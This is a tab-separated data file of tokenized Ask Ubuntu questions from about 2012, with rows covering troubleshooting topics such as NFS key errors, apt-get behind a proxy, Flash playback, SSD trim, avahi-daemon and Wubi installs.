205775	`` request-key : can not find command to construct key '' when accesing nfs mounted volumes	since i 've upgraded to 12.10 ( 3.5.0-17.28-generic 3.5.5 ) the next error appear in auth.log every time an nfs volume is accessed : request-key : can not find command to construct key any clues ?
205779	installing programs without apt-get	i would like to install some programs on a computer which uses a proxy to access to the internet . i tried to configure the proxy access but for reason that i do not understand this does not work . i can surf the web but not use apt-get . i get some errors containing 401 unauthorised which i do not understand bu make me think that the proxy is meant to prevent the type of connection that apt-get uses . i mainly want to install emacs . how can this be done simply using a web browser ?
205780	where to configure synaptics touchpad to use inverted two finger scrolling ?	i want to configure my synaptics touchpad to user inverted scrolling with two fingers . where to configure synaptics for this in ubuntu 12.04 ?
205786	kubuntu permanent install wo n't attach sound card	i installed kubuntu live version and sound card visible in the volume/mixer panel . after installing the permanent version i have a dummy output where my sound card should be , therefore no sound . i re-installed the live version three times and then to permanent but the same problem each time . there is a very brief error on boot up to the permanent version that says : error . can not attach card default . no such file or directory . i 'm running kubuntu 12.04 on a mac g4 ppc with no other os . i 'm very new to linux . i am able to follow instructions to help resolve this , but i 'm not familiar with the os . unable to paste into the terminal . i have checked very carefully and there are no typing errors . this is certain : ) when i type the command iḿ then prompted for my [ sudo ] password for rob . on entering this the error returned is ¨sudo : rm/etc/modprobe.d/blacklist.local.conf : command not found¨
205789	how to run android applications in eclipse ?	my system is dell inspiron 15r ( n5010 ) and i am having trouble becuase of 64 bit system . on running android application i am getting error : error executing aapt . please check aapt is present at /home/rahul/android-sdks/platform-tools/aapt before this error i was getting adb not found error . i tried to install ia32-libs but ca n't . i also put my question here ( how to install ia32-lib on 64 bit system ? ) but nothing helped . please help ! !
205793	size/length limitations of bash scripts	i am wondering if there is any size , length or even run-time limitations with bash scripts . i am installing php-hiphop on debian squeeze ( i know it 's not ubuntu but i presumed there were some bash experts hanging around here ) on a test server , and there is quite a lot of extra libraries and configuring to do before even attempting to compile hiphop so i plan to make a bash script so that updating other servers will be quicker . i 'm pretty new to linux systems , this is actually my first time properly using one , and i have no idea how much or how little bash files can do . as an example , i have to update gcc to 4.6 which at the make command is taking 5+ hours , and was wondering even after that long will the bash script be able to continue ? i have also noticed one can use multiple bash scripts and use wait to wait for a command to finish then execute another script , would this be a better approach ? thanks in advance .
205795	youtube flash 64 bits very slow on fullscreen mode ( sandy bridge )	i 've been trying to get a decent speed on youtube flash videos since ubuntu 11.10 but i still get the same slow down . it seens to be a 64bit only problem . i 've already tried to use flashaid on firefox but the slowness wasnt solved . my currently best result is using google chrome ( not chromium ) and his proprietary flash plugin . full screen works fine on 480p but anything greater than that get slow and a ghost effect in the video appears . this shouldnt be hardware problem ( i5 2430 , and the hd3000 should be fine for that ) , on windows everthing works fine . even the `` overridegpuvalidation '' for the adobe plugin didnt work . any ideas ? chrome flash version descri巽達o : shockwave flash 11.4 r31 vers達o : 11.4.31.110 local : /opt/google/chrome/pepperflash/libpepflashplayer.so firefox flash version nome : shockwave flash vers達o : 11.2 r202 local : /usr/lib/mozilla/plugins/libflashplayer.so thanks in advance ,
205799	how to change screen resolution ?	i am using hp g62 laptop and it has intel hd graphics . screen resolution in ubuntu os is fixed at 1024 x 768 . plz tell me how to change the screen resolution . apparently there is no option once i goes to system settings/ display
205800	bash does n't keep history	i run ubuntu 12.04 , and for some reason bash does not keep my command history . the ~/.bash_history file contains only 3 commands that i typed a few months ago . how can i fix this ? edit : here 's the relevant content of my .bashrc : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000
205803	nvidia graphic installed ?	i have an optimus graphic card and had the blank screen issue after installing nvidia drivers . i think i installed bumblebee drivers correctly and everything is running correctly . but , in the graphics category of system details , it says graphic driver unknown . questions : was bumblebee installed correctly and do i now have power management working in my laptop ? is nvidia now the primary graphic card ( the laptop also has intel mobility ) ? and if not , if i want to run apps with it , i just have to write optirun in the terminal ?
205806	how to install monodevelop ?	when i try it to install from ubuntu update manager i got the folling message : - the action would require the installation of packages from not authenticated sources . when i click on detail the followong message is appeared .so please tell me how to install this sowtware on my pc or tell me the other solution cli-common libart2.0-cil libgconf2.0-cil libgdiplus libglade2.0-cil libglade2.0-cil-dev libglib2.0-cil libglib2.0-cil-dev libgnome-vfs2.0-cil libgnome2.24-cil libgtk2.0-cil libgtk2.0-cil-dev libgtkspell0 libmono-addins-gui0.2-cil libmono-addins0.2-cil libnunit-cil-dev libnunit2.5-cil monodevelop
205807	convert text to data in spreadsheet when copying output data from terminal ?	my fortran code outputs two columns of data to the screen in a terminal . when i copy that to a spreadsheet , it always gets entered as `` text '' format . is there a way to convert it to data ? i 've tried many ways , including first copying it to a file , then loading the file to the spreadsheet , which fails . thanks a lot .
205809	thinkpad w520 fails to suspend	since updating to ubuntu 12.10 , my thinkpad w520 fails to suspend properly ( when closing the lid ) . it will stay on and not turn off . the little error report windows say it might be related to the proprietary nvidia driver . any way to debug this is appreciated , so i can file the appropriate bug reports .
205811	ca n't get openjdk java 7 runtime to open 'minecraft.jar ' file	i have 64bit ubuntu 12.10 installed with an intelâž coreâ˘ i5-3570k cpu . i use chromium . i have installed openjdk 7 but whenever i right-click the .jar file and click `` open with openjdk java 7 runtime '' nothing happens at all . i have tried this with openjdk 6 and nothing happens . could it be a 64bit conflict ? i have also tried a different minecraft.jar and nothing changed . the .jar is set to executable . please help .
205812	update manager not working ?	error when trying to access `` update manager '' . e : opening /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_libreoffice3.4-writerguide_ubuntu.list - ifstream : :ifstream ( 13 : permission denied ) ' bud @ bud-latitude-d530 : ~ $ sudo apt-get update ign http : //dl.google.com stable inrelease hit http : //dl.google.com stable release.gpg hit http : //dl.google.com stable release ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-security inrelease ign http : //archive.canonical.com precise inrelease hit http : //dl.google.com stable/main i386 packages hit http : //archive.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise-updates release.gpg hit http : //archive.canonical.com precise release.gpg ign http : //dl.google.com stable/main translationindex ign http : //extras.ubuntu.com precise inrelease hit http : //archive.ubuntu.com precise-security release.gpg hit http : //archive.ubuntu.com precise release hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release.gpg hit http : //archive.ubuntu.com precise-updates release hit http : //archive.ubuntu.com precise-security release hit http : //extras.ubuntu.com precise release hit http : //archive.canonical.com precise/partner sources hit http : //archive.ubuntu.com precise/restricted sources hit http : //archive.ubuntu.com precise/main sources hit http : //archive.ubuntu.com precise/multiverse sources hit http : //archive.ubuntu.com precise/universe sources hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex hit http : //extras.ubuntu.com precise/main sources hit http : //archive.ubuntu.com precise/universe i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex hit http : //archive.ubuntu.com precise-updates/restricted sources hit http : //archive.ubuntu.com precise-updates/main sources ign http : //dl.google.com stable/main translation-en_us hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse sources hit http : //archive.ubuntu.com precise-updates/universe sources ign http : //dl.google.com stable/main translation-en hit http : //archive.ubuntu.com precise-updates/main i386 packages hit http : //archive.ubuntu.com precise-updates/restricted i386 packages hit http : //archive.ubuntu.com precise-updates/universe i386 packages hit http : //archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex hit http : //archive.ubuntu.com precise-security/restricted sources hit http : //archive.ubuntu.com precise-security/main sources hit http : //archive.ubuntu.com precise-security/multiverse sources hit http : //archive.ubuntu.com precise-security/universe sources hit http : //archive.ubuntu.com precise-security/main i386 packages hit http : //archive.ubuntu.com precise-security/restricted i386 packages hit http : //archive.ubuntu.com precise-security/universe i386 packages hit http : //archive.ubuntu.com precise-security/multiverse i386 packages hit http : //archive.ubuntu.com precise-security/main translationindex hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en ign http : //archive.canonical.com precise/partner translation-en_us ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //archive.canonical.com precise/partner translation-en ign http : //extras.ubuntu.com precise/main translation-en reading package lists ... done
205813	how can i obtain an ipv4ll address when dhcp server is down ?	i edited the /etc/network/interfaces with the lines auto eth0 iface eth0 inet dhcp but , if the dhcp server is down , i want the interface obtains automatically a link-local address . is it possible ? or do i have to re-configure the /etc/network/interfaces with the lines auto eth0 iface eth0 inet ipv4ll everytime the dhcp server is down ?
205819	adobe flash player 11.2 security ?	the most recent flash player for windows is 11.4.x , for linux it is 11.2.x . are there already any security issues ? are security patches still released for the linux versions ?
205823	building fork off unity 2d	i have recently been meddling in unity 2d and how i can change it up too make it more my own . i was wondering if anyone knew of existing projects like this that i could join or any other who are interested in joining me ?
205826	which lan card / module combinations proven to work with wake on lan	i 've got a 12.04 headless server that i 've been trying to get to work with wake-on-lan . the card is marvel 88e8053 using the sky2 module . although wol is enabled in bios and ethtool shows the card as wol enabled , it refuses to wake when i send the magic packet . i have verified that the packet is being received ok when the machine is on . the machine does wake ok from a bios alarm which suggests it is a network card issue . i 've seen reference to bugs in sky2 that mean wol fails in recent versions of ubuntu ( and have tried a module conf file as suggested here but to no avail ) so i am thinking the best bet is to replace the ethernet card with one that definitely works with wol in 12.04 - please could you post your card make and model no if you are using it successfully , along with any tweaks you had to make ?
205828	how to run ubuntu 12.10 on a laptop with maximum power saving ?	i have a toshiba l500-21t with intel core i3 m330 2.13ghz having 4 cores with amd mobility rdeon 4500 graphic card , 360gb hd and 6gb ddr3 ram . how can i run my lappy smoothly while giving me reasonable battery life and less heat generation . [ i do n't want to use a cooler . ]
205829	eclipse shows `` workspace in use or can not be created , choose different one ''	if i log out & login again i am able to launch eclipse without the previously mentioned error . i am using ubuntu 12.04 ( 64 bit ) .
205834	ubuntu 12.10 with kernel 3.5.0-18 failing to boot	i had 12.04 with kernel 3.0.2 . today i have updated my system and got 12.10 with kernel 3.5.0-18 . now when i boot my machine with 3.5 kernel , it starts until the page where i enter my password . within seconds , i get a page with looooong list of some commands or list . i ca n't take screen-shot of that . it looks something like : [ 1.2234978942837 ] kjsahfa ; lsfksld ; fkjsf ; owieurwirejw/rnw ; erkjwelrjw2309480432 [ 1.3294823498230948 ] as ; lfjsf ; iuwrijrwjlkerjw ; rekwer ; lkwjre ; lkjrijweoriwe'jja ; luckily , in my boot page , i have 3.0.2 kernel also . when i boot with 3.0.2 kernel there is no problem . but when i boot with 3.5.0 , it throws that weird error . i wont be able to do anything at that time . none of the keys work . i have to forcibly shutdown the machine and restart with 3.0.2 kernel . please help .
205836	sudo update stucks at connecting	i have an ubuntu 12.04 lts server , and i want to install the gui , which causes error everytime . but before installing the gui , i want to run the update command : sudo apt-get update but i always get this error : it stuck at the `` connecting ... '' and then after some seconds it says failed and such . note that my nameservers are set to these : 8.8.8.8 8.8.4.4 what should i do ? !
205838	ubuntu 12.10 boots to purple screen	i know this question has been tackled in a couple different threads but i 've tried what i could from those and have not resolved the issue . i have just a basic understanding of this system so feel free to talk down to me or explain this like you would to a 5 year old . let 's start from the beginning . my son has a computer built by an it friend of mine ( we moved so he ca n't help any more ) . it had windows xp running on it and it just stopped working correctly . this same friend had built a laptop for me with ubuntu which i liked so i thought i 'd put a new os on my sons computer and it may work better . i downloaded ubuntu 12.10 onto a usb drive and loaded it onto his computer . i followed all the prompts , it installed , i restarted the computer , it gives me the option of which os to pick . i pick ubuntu and it seemingly loads . the desktop comes up with just the basic pinkish ubuntu background but that is it . there are no icons . i ca n't right click anywhere to create a file . left clicking the mouse does not create a square when moved . alt + f2 does n't do anything . i can open a terminal but any of the commands i have seen in previous threads do not correct any issues . what else can i do , or what resources are available to fix this problem ? i do n't know if there are additional files on the usb drive that i need to access or what . also , one of the problems we were having with my sons computer is that windows would only load to a blank screen . it runs accordingly in safemode and my install of ubuntu was through safemode of windows xp .
205839	how to have more workspaces created/removed automatically ?	is there a way to have the number of workspaces automatically increase and decrease intelligently ? for example : i set a minimum of 2 workspaces , but if i have windows on those workspaces , a 3rd workspace is automatically created . if i close out the windows on workspace 2 , then workspace 3 is removed .
205841	how do i mount a folder from another partition	is there a way to do a command to mount a folder from one partition to my main patition . example of what i 'd like to do , which obviously does n't work : mount /media/tc1/folder /home/dvad/home if not using a command is there another way i can do this ?
205850	why upgrade from lts to a x.10 version	recently in an omgubuntu 's article i saw some comments about the reason of the selection of ubuntu 12.10 over 12.04 lts for the new system76 's all in one . one of the comments said more or less `` why using 12.10 with 1.5 years of support over the 5 years the lts offer ? '' . until now i thought the x.10 version was more complete , but with this point of view of the lts , the lts will in some moment be more complete than 12.10 i guess . should i stick with the lts or upgrade to 12.10 and why ?
205855	apache / mysql is not running . what is wrong ?	i installed lampp / xampp on my ubuntu 12.04 . after installing , apache and mysql were running properly . now , they 're not . here 's what i get when i try to run apache : command : /etc/init.d/apache2 start result : * starting web server apache2 /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information .
205856	display cloning does n't work anymore ( nvidia )	i used to clone my laptop 's display to an external monitor by just typing disper -c in a terminal . one of the recent updates broke this functionality . it now says $ disper -c displays share no common resolution a friend of mine has experienced exactly the same problem , so i do n't think is has to do with my particular display configuration . does anybody know what happened and whether there 's a workaround ? it 's specially annoying given that it used to work fine before .
205861	hp envy 15 speakers partially working ( beats audio )	anybody have all 5 speakers ( front l+r , rear l+r and woofer ) working ? currently only the front two ( front l+r ) are working . i 'm running a fresh install of 12.10 . headphones work fine though . does n't matter which program is producing audio either .
205864	will 32 bit ubuntu will work fine on 64 bit machine ?	i am getting some problems in 64 bit ubuntu..i want to install ia32-libs for android sdk but it is not installing , i tried too hard . so i want to know that will 32-bit ubuntu will work as good as 64-bit ubuntu ? i have dell inspiron 15r ( n5010 ) . so how can i install ubuntu 32-bit and can i install it direct from windows using wubi ?
205867	how can i get a single-click workspace switcher ?	easy workspace switching has always been one of the strongest feature of linux . it 's a huge productivity boost not unlike having multiple monitors but without the need to carry a large desk and monitors with you all the time : - ) good implementations have existed in different desktop environments since the early 90s . i thought osx was catching up when they came up with 'spaces ' but they made this very slow two steps plus animations process that made working with multiple 'spaces ' quite a pain . to my horror it seems ubuntu ( in my case 12.04 ) copied this osx ui and made it the default . is there a way to install a one click workspace switcher ? it would be neat if it dynamically showed me an image of the desktops like it used to , but mainly it just has to be single-click . i know there are keyboard shortcuts but i also need a solution for when my hands are not on the keyboard . the other problem with the current workspace switcher is that when i have a lot of apps opened , it gets pushed down to the 'stacked icons ' part of the dock and it then becomes an even slower process to change workspace . i ca n't seem to be able to move this icon ( i guess another question would be how to do this ) . as one of the most often used dock icon , should n't it be at the top of the dock ? edit : i was just told by this site to explain how this is different from other questions about workspace switchers . the important thing is that it has to to be a single-click mouse manipulation ( as it has been in unix type desktops since about 1995 ) . other questions only mention keyboard shortcuts or 2 or more steps solutions . to me this is unacceptable for an action as frequent as desktop switching .
205871	why will upgrading ubuntu cause problems ?	this is a general question about the changes that occurs in the development of ubuntu . i want to know if ubuntu , let 's say 12.04 , is working fine on my laptop . why when i upgrade it to a newer version 12.10 , sometimes it will not work ? for example , a black screen , boot hang ups , etc . is n't 12.10 an exact copy of 12.04 but with added support to some new hardwares and new cool stuff like amazon lens ?
205872	failed to load session `` ubuntu ''	i installed ccsm to enable window previews in unity . but when i went into extras , there was no 'window preview ' option . so i tried experimenting with other options in compiz and now there are no borders in the dialogue boxes ( close , minimize , restore buttons are not there , i had enabled some 'flat ... . ' option in compiz . later , i uninstalled compiz and then reinstalled it . now it says '' failed to load session ubuntu '' i ca n't even access through the guest account , i am new to ubuntu . ( please explain in detail ) . all i have access to is the login screen ( it still shows my custom wallpaper ) . please help , i do n't want to lose my stuff .
205877	problem installing ubuntu 12.04 - [ errno 5 ]	i 'm trying to intall ubuntu 12.04 to my brand new ebay purchased hard drive . only got the drive today and already it 's causing me problems . the seller is a proper proffesional company with 99.9 % positive feedback , so it seems unlikely they would have sold me something rubbish . my old hard drive packed up last tuesday and so i bought a new one to replace it . because this was an entirely new drive i decided to install ubuntu as there was no current operating system . my computer is an emachines em250 netbook . there 's no disc drive so i am installing from a usb stick . the new operating system loads beautifully , and the desktop appears just as it should . when i click install i am taken to the installer which copies the files to about 35 % and then displays this : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . the hard drive can be heard constantly crackling . when i booted ubuntu 12.04 from my old faulty hard drive as a test , i did n't even make it past the purple ubuntu screen , so it ca n't be that bad . any ideas ? message to the moderators . please do not close this thread . i 'm well aware there may be other threads on this , but i do n't want it closing as the others do not provide the answer i am looking for . thank you .
205885	hiding the sidebar in ubuntu	i have two questions : first , i wanted to hide ubuntuâs side-bar , so i set the settings in appearance to 'autohide ' . the side bar did indeed disappear but when i roll over the left side , the side bar do n't appear again . so , i am using a virtual box . can it explain the fact that this bar does n't show again when it is set to autohide . second , assuming i would n't be able to come over the problem , i pined to the dock every element of the sidebar , except the dash home . is it possible either to pin it in the dock or to launch it from the terminal ?
205889	audio playback : part of song is skipped	i am experiencing some problems with music playback after upgrading to ubuntu 12.10 . basically some of the songs stop playing after some time as if the song has ended . it 's always the same songs and the same time . the weird thing that it happens with clementine and totem but vlc does n't have this problem and it also plays as it should on windows . i 'm guessing there might be a problem with some library that 's shared with by the first two applications . i do n't know if it 's relevant but the file format of the audio files is flac ( do n't know if the problem affects mp3 , because i do n't have many of them ) .
205891	deja dup backup to cd/dvd possible or not ?	i started to use linux/ubuntu 12.04 last week . i 'm a new comer . i liked this o.s . but i have a question which i could n't find the answer here and by google search . the question is `` can i get scheduled backups to cd/dvd with deja dup software on ubuntu o.s ? '' the firm that i 'm working has a 700mb folder to be backed up . the files in the folder can be changed by any user during the day . so we need to backup the whole 700mb folder each day . the best solution comes to my mind is that taking the back-up to a cd or dvd . it will be very easy if this back-up procedure is scheduled by a program . do you have any answers ? thanks in advance altan from turkey/istanbul
205905	having troubles installing ubuntu using wubi	i am trying to install ubuntu on my toshiba laptop , it is a 64 bit system and is running windows 7 i keep on getting this error error executing command command=c : \users\a'den\appdata\local\temp\pyla524.tmp\bin ] resize2fs.exe -c : \ubuntu\disks\root.disk17744m recal=1 stderr= stdout=resie2fs 1.40.6 ( 09-feb-2008 ) usage : /cygdrive/c/users/aden/appdata/local/temp/pyla524.tmp/bin/resize 2fs.exe-f c : /disks/root.disk 17744m [ -d debug_flags ] [ -f ] [ -f ] [ -p ] device [ new-size ] and the log file reads
205910	aptana studio 3 gives me a java missing error ?	after downloading aptana en extracting it in my home folder i run it like so ./aptanastudio3 after that i get a box saying a java runtime environment ( jre ) or java development kit ( jdk ) must be available in order to run aptana studio 3 . no java virtual machine was found after searching the following locations : /home/****/.aptana_studio_3/jre/bin/java java in your current path i have never installed java on my ubuntu machines . i am currently running 12.10
205915	deleting a large file does not free up space	i deleted a large file ( 6 gb ) located in my home directory but the free space is not increased . i have tried looking the file in trash folder by typing cd ~/.local/share/trash/files but it 's not listed there . i have tried running sudo apt-get clean but the problem is n't solved . i have also tried sudo lsof +l1 to see if any other process are using it but it 's not showing up there either . anyone have any suggestions ?
205922	ubuntu 12.10 gets stuck at startup ( laptop )	i have noticed that almost 30 % of the times , ubuntu gets stuck at the `` purple '' screen before the actual ubuntu symbol comes when the os loads . why is this and how can i fix it ? ps : i have this peculiar entry in boot menu . 1st its `` ubuntu '' and then when i choose the other option it takes me to the 3.2 's generic and safe kernel version . interestingly i am using the 3.5.0-17 generic version of the kernel . ( is this the latest for ubuntu ? )
205924	k3b does not read blank cd after upgrade from ubuntu 12.04 to 12.10	i upgraded my ubuntu to the latest 12.10 through the software update , and it updated fine . now when i try to burn cd 's , it seems like it can not read the blank disc . i 'm using k3b . before the update it was fine , any suggestions ?
205926	egalax touchscreen not working jolicloud 1.2	i have an egalax touchscreen on an acer aspire one running jolicloud 1.2 i have had success getting this touchscreen to work correctly on ubuntu 10.04nbr , 11.04 and kubuntu 12.04 and puppy linux , so i am pretty happy with how it should be done . however , i can not get it to calibrate correctly or remember calibration settings . i have installed the egalax utility ( all available versions ) and it does not recognize the screen . xinput_calibrator works but the config can not be made permanent . problems i have identified : -joli does n't have an xorg.conf file and does not use xorg.conf.d for evdev configuration -setting configs through hal does n't work anymore the best i can get is a poorly adjusted touchscreen with a reversed y axis . any help greatly appreciated
205930	automatic trim vs. manual trim	i am currently trying to find out how to trim with my new tp and was wondering about the difference of manual/online trimming . here is my setup : thinkpad t430s with ssd samsung 830 , 128gb and xubuntu 12.10 , here are some outputs to check if trim will work on my system ( got these from here : http : //wiki.ubuntuusers.de/ssd/trim ) root @ eike-tp : ~ # sudo hdparm -i /dev/sda | grep -i trim * data set management trim supported ( limit 8 blocks ) first , i tried the online trimming : how to enable trim ? my fstab with discard inserted : uuid=d6c49c17-a4f1-466c-9f7e-896c20db3bba / ext4 discard , noatime , errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=a0322f5f-c6c1-4896-863f-668f0638d8cf none swap sw 0 0 tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 i tried to test if it works ( but i do n't get any zeroes when i try it with /dev/sda ) , but found out that this method is only possible with ssd type 2 and i seem to have type 3 . so i do n't know if it works or not . the ubuntuwiki ( first link ) recommends manual trimming , so i set up a daily cronjob instead of discard : # ! /bin/sh log=/var/log/batched_discard.log echo `` *** $ ( date -r ) *** '' > > $ log fstrim -v / > > $ log the wiki article suggests weekly or daily . now to my questions : how often executes the automated trim ? how often is recommended ? online vs. manual trimming ? thank you for your help
205931	on ubuntu 12.10 , empathy as startup application caused hud to open behind other windows	anyone know of a fix for this behavior . having empathy as a startup application causes the hud to only open behind other windows . it does n't matter if the windows were opened at startup , or later , the hud will only open behind them if empathy is a startup application . my other startup applications do n't cause this ( dropbox , skype , thunderbird , ubuntu one ) , only empathy . any ideas or solutions ?
205934	how to decompress and access a 10 year old ace file ?	i 'm trying to unarchive some old photos i have that are stored in ace format ( via winace ) . the file was created a little over 10 years ago . i 'm running unace l photos.ace and getting what seems to be a full list files . when i run unace e photos.ace i and am getting an error . the output is : unace v1.2 public version processing archive : photos.ace authenticity verification : created on 16.8.2002 by *unregistered version* mt . st. helens analyzing file compressed with unknown method . decompression not possible . error occurred does anyone have any suggestions/ideas on how to extract these ? edit : i 've downloaded the linux version ( v2.5 ) from winace.com 's site with the same effect .
205937	how can i disable avahi-daemon ?	how can i disable avahi-daemon and can you explain to me how it runs if it appears as a service but it its n't in rcn.d ? you can stop reading here . in fact , please do unless you want to teach a noob some ubuntu . the question above should be clear enough to be answered . the rest is just me calling out for some more structured way of finding one 's way around ubuntu . i can more or less use other `` unix-like '' systems . i am a beginner so if i act nonsensically , consider me your daily wtf but do help me improve , please . at every boot , /sbin/init seems to be launching a process called avahi-daemon # initctl list | grep avahi avahi-daemon start/running , process 1280 as user avahi # id avahi uid=107 ( avahi ) gid=118 ( avahi ) groups=118 ( avahi ) a ps -efww ef shows 2 processes active , both called avahi-daemon , and the ppid of the first avahi-daemon is indeed 1 , the second process is just a child of the first . the ppid = 1 is what makes me think this was auto-started . optionally : i do n't really know how to check properly what gets executed at system startup , thinking about it . is this the way to get a list of services that run at startup ? initctl list | sort anyway , i seem to be able to temporarily stop this `` service '' through this command : service avahi-daemon stop or indeed this command /etc/init.d/avahi-daemon stop directly , which is what this /usr/sbin/service seems to be using : env -i lang= '' $ lang '' path= '' $ path '' term= '' $ term '' `` $ servicedir/ $ service '' when launched , the script reminds me that i am controlling an `` upstart '' service , and that i should use the simpler invocation stop avahi-daemon . i guess i will need to learn about upstart but for now , all i need to learn is this : how do i disable services in ubuntu ? here is what i tried ( this should be the proper way to do it , or is it not ? ) : update-rc.d avahi-daemon disable but it complains : system start/stop links for /etc/init.d/avahi-daemon do not exist so i went hunting for the path to the binary : # let me know if there is a better way to get the path above readlink `` /proc/ $ ( echo `ps -- no-headers -o pid -c avahi-daemon | head -n 1` ) /exe '' which is this : /usr/sbin/avahi-daemon and anything that could be considered an `` executable file '' in etc : find /etc -type f -name '*avahi* ' -perm -u+x thinking i would find startup scripts in /etc/rcn.d . i found other things instead : /etc/dhcp/dhclient-exit-hooks.d/zzz_avahi-autoipd /etc/dhcp/dhclient-enter-hooks.d/avahi-autoipd /etc/resolvconf/update-libc.d/avahi-daemon /etc/network/if-up.d/avahi-autoipd /etc/network/if-up.d/avahi-daemon /etc/network/if-down.d/avahi-autoipd /etc/avahi/avahi-autoipd.action seems like this avahi-daemon thing is being launched on network state changes ? is there a better way to hunt down binaries automatically started on a system ? i would have normally obliterated the symlinks in the various rc { 3,5 } .d at this stage but now i am not too sure . what exactly starts this beast ? how to disable it without apt-get remove or apt-get purge ? it does not have too many resources open , as far as i can see : lsof -p $ ( echo `ps -- no-headers -o pid -c avahi-daemon | head -n 1` ) nor does it use too many cpu cycles , based on a quick glance at htop . i wrote this one-liner to see if it goes funky on cpu util over a period of one minute , and it never does , but let me know if there are better ways to check that : for i in { 1..59 } ; do ps -p $ ( echo `ps -- no-headers -o pid -c avahi-daemon | head -n 1` ) -- no-headers -o pcpu ; sleep 1 ; done
205941	kompozer gives an error when runned under 12.10 amd64	i downloaded kompozer extracted it and run kompozer like ./kompozer so then i get this error in the gnome-terminal gtk-message : failed to load module `` overlay-scrollbar '' /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so : wrong elf-class : elfclass64 ( kompozer-bin:8651 ) : gtk-warning ** : failed to load type module : /usr/lib/gtk-2.0/2.10.0/menuproxies/libappmenu.so how can i get kompozer to work under 12.10 amd64 ? note : the error above had some dutch words in them so i translated it !
205951	ubuntu 12.10 crashed when i used the suspend option	i have just installed ubuntu 12.10.i386 on an old pentium 4 3ghz dual processor , with a 128 mb graphics card and 2gb ram . did n't have problem 's with any of the hardware what so ever . i also think it fried my motherboard because it wont start again ... is this possible ?
205952	will installing openjdk 7 set it automatically as the default jre ?	i just upgraded to 12.10 and so far it has been the smoothest upgrade ever . i was surprised to see that the version 6 is still around and was not replaced by java 7 . is it recommended to install openjdk 7 ? i was thinking of installed java 7 but from what i read around , it seems that i may have to set it as the default java environment . is this really necessary ?
205953	ubuntu 12.10 and windows 7 network : network password does n't work	look : http : //youtu.be/w3j_c4wct7k when i try to access my windows 7 pc , it ask for a password , i typed in the same password of the `` home group '' in windows , but it does n't work ... how do i fix this ?
205955	can not add folders to ubuntu one	i have signed up with ubuntu one ( 20gb ) and i 'm having the following issue : i basically can not add folders through the panel interface . i have been able to add five folders so far , but i 'd like to add some more ( yes , they are inside the home folder ) . i do n't get no errors , but nothing is added to the folders list . by using the command line interface like this u1sdtool -- create-folder /home/alex/web it basically hangs . nothing happens . if i then list the folders with command line , my folder is not there . any idea ? ( i 'm on 12.10 )
205957	would it be practical/secure to import my gpg keys into ( open ) ssh ?	i know a bit about computer security , and well as about the concept of public and private keys . i also know that both gpg and ( open ) ssh use the public/private key system . my question is , is there any reason that i would not want to use my gpg keys as authentication for ssh ? please note that , while a have a little bit more experience with linux , gpg , and ssh than the average computer user , i am by no means an expert . please be patient and point out any mistakes that you might see .
